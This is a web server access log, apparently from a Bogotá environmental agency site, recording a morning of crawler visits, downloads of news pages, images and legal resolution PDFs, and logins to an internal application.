172.22.2.4 - - [02/Apr/2023:07:16:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:07:17:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
201.245.192.253 - - [02/Apr/2023:07:20:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42867
201.245.192.253 - - [02/Apr/2023:07:20:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43191
216.245.221.92 - - [02/Apr/2023:07:20:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:07:21:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
34.147.118.53 - - [02/Apr/2023:07:21:33 -0500] "GET /caminatas-ecologicas-en-bogota-inscribete-y-participa-en-los-recorridos-de-abril.html HTTP/1.1" 200 868
179.19.8.232 - - [02/Apr/2023:07:22:29 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328851
79.152.61.19 - - [02/Apr/2023:07:23:02 -0500] "GET /secretaria-de-ambiente-ha-incautado-estos-dias-mas-de-55-kilos-de-palma-silvestre-y-refuerza-controles-previo-a-domingo-de-ramos.html?fbclid=IwAR3rOq88Lpug8z6pcI0PVPM_UYuRzxpElwWyEIpSf7ZM4F5nPAclLpg8Kes HTTP/1.1" 200 1109
173.252.111.11 - - [02/Apr/2023:07:23:40 -0500] "GET /secretaria-de-ambiente-ha-incautado-estos-dias-mas-de-55-kilos-de-palma-silvestre-y-refuerza-controles-previo-a-domingo-de-ramos.html HTTP/1.1" 206 1109
173.252.111.10 - - [02/Apr/2023:07:23:44 -0500] "GET /secretaria-de-ambiente-ha-incautado-estos-dias-mas-de-55-kilos-de-palma-silvestre-y-refuerza-controles-previo-a-domingo-de-ramos.html HTTP/1.1" 206 1109
172.22.2.4 - - [02/Apr/2023:07:22:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:07:23:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51610
172.22.2.4 - - [02/Apr/2023:07:25:40 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [02/Apr/2023:07:25:41 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1018
216.245.221.92 - - [02/Apr/2023:07:25:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:07:24:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
201.245.192.253 - - [02/Apr/2023:07:26:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:07:25:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
34.147.118.53 - - [02/Apr/2023:07:26:21 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
34.91.50.11 - - [02/Apr/2023:07:28:52 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [02/Apr/2023:07:28:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:07:30:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42867
201.245.192.253 - - [02/Apr/2023:07:30:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43191
216.245.221.92 - - [02/Apr/2023:07:30:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:07:31:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:07:29:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
172.22.2.4 - - [02/Apr/2023:07:32:25 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
66.249.73.63 - - [02/Apr/2023:07:32:26 -0500] "-" 408 -
186.28.132.181 - - [02/Apr/2023:07:34:20 -0500] "GET /secretaria-de-ambiente-entrego-balance-de-su-gestion-en-2022-y-presento-los-retos-para-el-2023.html?fbclid=IwAR3mhAdbLeLaL67_xt466XKlbktzRslCUtzsqmqeUnbtJeGpbAj8HIpgBwI HTTP/1.1" 200 968
173.252.107.18 - - [02/Apr/2023:07:35:34 -0500] "GET /images/cronica-mujer-31-enero.jpg HTTP/1.1" 200 29531
66.220.149.14 - - [02/Apr/2023:07:35:35 -0500] "GET /images/cronica-mujer-31-enero.jpg HTTP/1.1" 200 29531
216.245.221.92 - - [02/Apr/2023:07:35:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:07:35:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:07:34:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:07:35:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54414
40.77.167.80 - - [02/Apr/2023:07:37:21 -0500] "GET /BLA/resoluciones/AUTOS%202022/0502.pdf HTTP/1.1" 304 -
186.155.15.53 - - [02/Apr/2023:07:37:30 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
186.155.15.53 - - [02/Apr/2023:07:37:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 407265
201.245.192.253 - - [02/Apr/2023:07:40:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42867
201.245.192.253 - - [02/Apr/2023:07:40:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43191
216.245.221.92 - - [02/Apr/2023:07:40:45 -0500] "HEAD / HTTP/1.1" 200 -
179.19.8.232 - - [02/Apr/2023:07:40:44 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 449478
201.245.192.253 - - [02/Apr/2023:07:41:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
192.46.231.228 - - [02/Apr/2023:07:41:37 -0500] "GET / HTTP/1.1" 200 319
192.46.231.228 - - [02/Apr/2023:07:41:38 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [02/Apr/2023:07:40:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:07:41:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [02/Apr/2023:07:45:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:07:45:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
180.242.71.73 - - [02/Apr/2023:07:46:54 -0500] "GET / HTTP/1.1" 200 319
52.167.144.150 - - [02/Apr/2023:07:47:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/6834.pdf HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2023:07:46:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:07:46:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
66.249.73.35 - - [02/Apr/2023:07:50:28 -0500] "-" 408 -
216.245.221.92 - - [02/Apr/2023:07:50:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:07:50:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
69.171.249.9 - - [02/Apr/2023:07:52:18 -0500] "GET /guadalupe-aguanoso-y-otros-tres-caminos-de-los-cerros-estarin-cerrados-este-fin-de-semana.html HTTP/1.1" 206 797
40.77.167.211 - - [02/Apr/2023:07:52:19 -0500] "GET /bla/resoluciones/autos%202021/5233.pdf HTTP/1.1" 200 402593
172.22.2.4 - - [02/Apr/2023:07:51:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:07:52:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [02/Apr/2023:07:54:50 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7486
172.22.2.4 - - [02/Apr/2023:07:55:08 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [02/Apr/2023:07:55:13 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [02/Apr/2023:07:55:13 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
216.245.221.92 - - [02/Apr/2023:07:55:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:07:55:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
186.155.15.53 - - [02/Apr/2023:07:57:05 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 889384
52.167.144.46 - - [02/Apr/2023:07:58:06 -0500] "GET /bla/resoluciones/resoluciones%202022/0039.pdf HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2023:07:57:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:07:58:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
216.245.221.92 - - [02/Apr/2023:08:00:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:08:00:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
34.90.14.23 - - [02/Apr/2023:08:01:21 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [02/Apr/2023:08:02:38 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
186.28.69.220 - - [02/Apr/2023:08:03:21 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 13502
186.28.69.220 - - [02/Apr/2023:08:03:28 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 889384
186.28.69.220 - - [02/Apr/2023:08:04:07 -0500] "GET /BLA/resoluciones/AUTOS%202014/3032.pdf HTTP/1.1" 200 588139
204.199.94.91 - - [02/Apr/2023:08:04:13 -0500] "GET /secretaria-de-ambiente-ha-incautado-estos-dias-mas-de-55-kilos-de-palma-silvestre-y-refuerza-controles-previo-a-domingo-de-ramos.html HTTP/1.1" 200 1109
66.249.73.39 - - [02/Apr/2023:08:04:47 -0500] "-" 408 -
34.91.36.176 - - [02/Apr/2023:08:04:53 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
193.32.162.159 - - [02/Apr/2023:08:05:08 -0500] "GET / HTTP/1.1" 200 319
193.32.162.159 - - [02/Apr/2023:08:05:18 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
172.22.2.4 - - [02/Apr/2023:08:03:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [02/Apr/2023:08:05:45 -0500] "HEAD / HTTP/1.1" 200 -
186.155.15.53 - - [02/Apr/2023:08:05:45 -0500] "GET /BLA/resoluciones/AUTOS%202014/0376.pdf HTTP/1.1" 200 609393
201.245.192.253 - - [02/Apr/2023:08:05:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:08:04:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
34.91.36.176 - - [02/Apr/2023:08:07:42 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
173.252.83.11 - - [02/Apr/2023:08:07:44 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
213.186.1.154 - - [02/Apr/2023:08:08:09 -0500] "GET /images/rendici%C3%B3n-de-cuentas-2_optimized.jpeg HTTP/1.1" 406 -
213.186.1.154 - - [02/Apr/2023:08:08:09 -0500] "GET /images/camianatas-abril-jpg_optimized.jpg HTTP/1.1" 200 96625
213.186.1.154 - - [02/Apr/2023:08:08:14 -0500] "GET /images/rendicion-de-cuentas-post-01-02-(1)_optimized.jpg HTTP/1.1" 200 121430
201.244.213.69 - - [02/Apr/2023:08:08:19 -0500] "GET /forest/ HTTP/1.1" 200 12041
201.244.213.69 - - [02/Apr/2023:08:08:34 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
34.90.4.87 - - [02/Apr/2023:08:08:43 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
173.252.107.16 - - [02/Apr/2023:08:08:51 -0500] "GET /images/semana-bosques-1_optimized.1.jpg HTTP/1.1" 200 102892
69.63.189.3 - - [02/Apr/2023:08:09:01 -0500] "GET /images/idpyba-4-marzo-1_optimized.jpeg HTTP/1.1" 200 115318
69.63.189.118 - - [02/Apr/2023:08:09:01 -0500] "GET /images/calidad-del-aire-suroccidental_optimized.jpeg HTTP/1.1" 200 175446
34.90.4.87 - - [02/Apr/2023:08:09:49 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
186.31.212.11 - - [02/Apr/2023:08:10:09 -0500] "GET /secretaria-de-ambiente-ha-incautado-estos-dias-mas-de-55-kilos-de-palma-silvestre-y-refuerza-controles-previo-a-domingo-de-ramos.html HTTP/1.1" 304 -
66.249.66.10 - - [02/Apr/2023:08:10:11 -0500] "-" 408 -
216.245.221.92 - - [02/Apr/2023:08:10:45 -0500] "HEAD / HTTP/1.1" 200 -
152.203.219.27 - - [02/Apr/2023:08:10:52 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
152.203.219.27 - - [02/Apr/2023:08:10:52 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:52 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:10:53 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [02/Apr/2023:08:10:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
152.203.219.27 - - [02/Apr/2023:08:11:06 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16696
152.203.219.27 - - [02/Apr/2023:08:11:06 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:06 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:07 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:07 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
152.203.219.27 - - [02/Apr/2023:08:11:07 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:07 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2023:08:09:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.203.219.27 - - [02/Apr/2023:08:11:11 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:11 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 3255
152.203.219.27 - - [02/Apr/2023:08:11:12 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 36680
152.203.219.27 - - [02/Apr/2023:08:11:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:13 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:11:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
34.147.120.241 - - [02/Apr/2023:08:11:13 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [02/Apr/2023:08:09:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50273
173.252.107.1 - - [02/Apr/2023:08:11:56 -0500] "GET /images/calidad-del-aire-suroccidental_optimized.jpeg HTTP/1.1" 200 175446
173.252.107.21 - - [02/Apr/2023:08:11:56 -0500] "GET /images/empresas-alertas_optimized.jpeg HTTP/1.1" 200 142365
172.22.2.4 - - [02/Apr/2023:08:10:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54798
173.252.107.12 - - [02/Apr/2023:08:12:00 -0500] "GET /images/17%20de%20febrero%20mujeres%20que%20reverdecen.jpeg HTTP/1.1" 200 85735
173.252.107.20 - - [02/Apr/2023:08:12:00 -0500] "GET /images/Puntos%20calientes%2024%20de%20febrero.jpeg HTTP/1.1" 200 42626
173.252.107.20 - - [02/Apr/2023:08:12:00 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
173.252.107.11 - - [02/Apr/2023:08:12:00 -0500] "GET /images/WhatsApp%20Image%202023-02-15%20at%205.07.25%20PM.jpeg HTTP/1.1" 200 50573
173.252.107.9 - - [02/Apr/2023:08:12:00 -0500] "GET /images/camino-a-los-cerros-1_optimized.jpeg HTTP/1.1" 200 222279
173.252.107.4 - - [02/Apr/2023:08:12:00 -0500] "GET /images/28%20de%20febrero%20operativo.jpeg HTTP/1.1" 200 62220
173.252.107.6 - - [02/Apr/2023:08:12:00 -0500] "GET /images/calidad-aire-2-marzo-1_optimized.jpeg HTTP/1.1" 200 51562
173.252.107.12 - - [02/Apr/2023:08:12:01 -0500] "GET /images/24%20de%20febrero%20Sendero%20guadalupe%202.jpeg HTTP/1.1" 200 70964
173.252.107.9 - - [02/Apr/2023:08:12:01 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
173.252.107.11 - - [02/Apr/2023:08:12:01 -0500] "GET /images/idpyba-4-marzo-1_optimized.jpeg HTTP/1.1" 200 115318
173.252.107.20 - - [02/Apr/2023:08:12:01 -0500] "GET /images/Juan%20Rey%20febrero%2013.jpg HTTP/1.1" 200 55934
173.252.107.6 - - [02/Apr/2023:08:12:01 -0500] "GET /images/Secretarias%20Fondo%20carga%206%20de%20febrero.jpeg HTTP/1.1" 200 55460
173.252.107.20 - - [02/Apr/2023:08:12:01 -0500] "GET /images/vertimiento-Comprimida%20(1).png HTTP/1.1" 200 22870
173.252.107.4 - - [02/Apr/2023:08:12:01 -0500] "GET /images/8%20de%20febrero%20incendio%20forestal.jpeg HTTP/1.1" 200 56283
173.252.107.119 - - [02/Apr/2023:08:12:01 -0500] "GET /images/Conversatorio%20aire%201%20(1).jpeg HTTP/1.1" 200 72040
173.252.107.9 - - [02/Apr/2023:08:12:01 -0500] "GET /images/Rmasar%2018%20de%20febrero%20Grupo.jpg HTTP/1.1" 200 68398
173.252.107.12 - - [02/Apr/2023:08:12:01 -0500] "GET /images/2%20de%20febrero%20liberaci\xc3\xb3n%20Tunjo.jpeg HTTP/1.1" 404 1034
157.55.39.212 - - [02/Apr/2023:08:15:24 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
216.245.221.92 - - [02/Apr/2023:08:15:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:08:15:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
152.203.219.27 - - [02/Apr/2023:08:16:52 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:52 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:52 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
152.203.219.27 - - [02/Apr/2023:08:16:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:53 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
152.203.219.27 - - [02/Apr/2023:08:16:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.219.27 - - [02/Apr/2023:08:16:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2023:08:15:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.150 - - [02/Apr/2023:08:17:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3104.pdf HTTP/1.1" 304 -
40.77.167.80 - - [02/Apr/2023:08:17:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0273.pdf HTTP/1.1" 200 682243
172.22.2.4 - - [02/Apr/2023:08:16:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
172.22.2.4 - - [02/Apr/2023:08:19:22 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
172.22.2.4 - - [02/Apr/2023:08:19:41 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [02/Apr/2023:08:19:45 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [02/Apr/2023:08:19:45 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
201.245.192.253 - - [02/Apr/2023:08:20:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42706
201.245.192.253 - - [02/Apr/2023:08:20:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43034
216.245.221.92 - - [02/Apr/2023:08:20:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:08:20:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:08:21:42 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
186.155.15.53 - - [02/Apr/2023:08:22:02 -0500] "GET /BLA/resoluciones/AUTOS%202014/0367.pdf HTTP/1.1" 200 909044
66.249.73.35 - - [02/Apr/2023:08:22:24 -0500] "-" 408 -
172.22.2.4 - - [02/Apr/2023:08:21:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
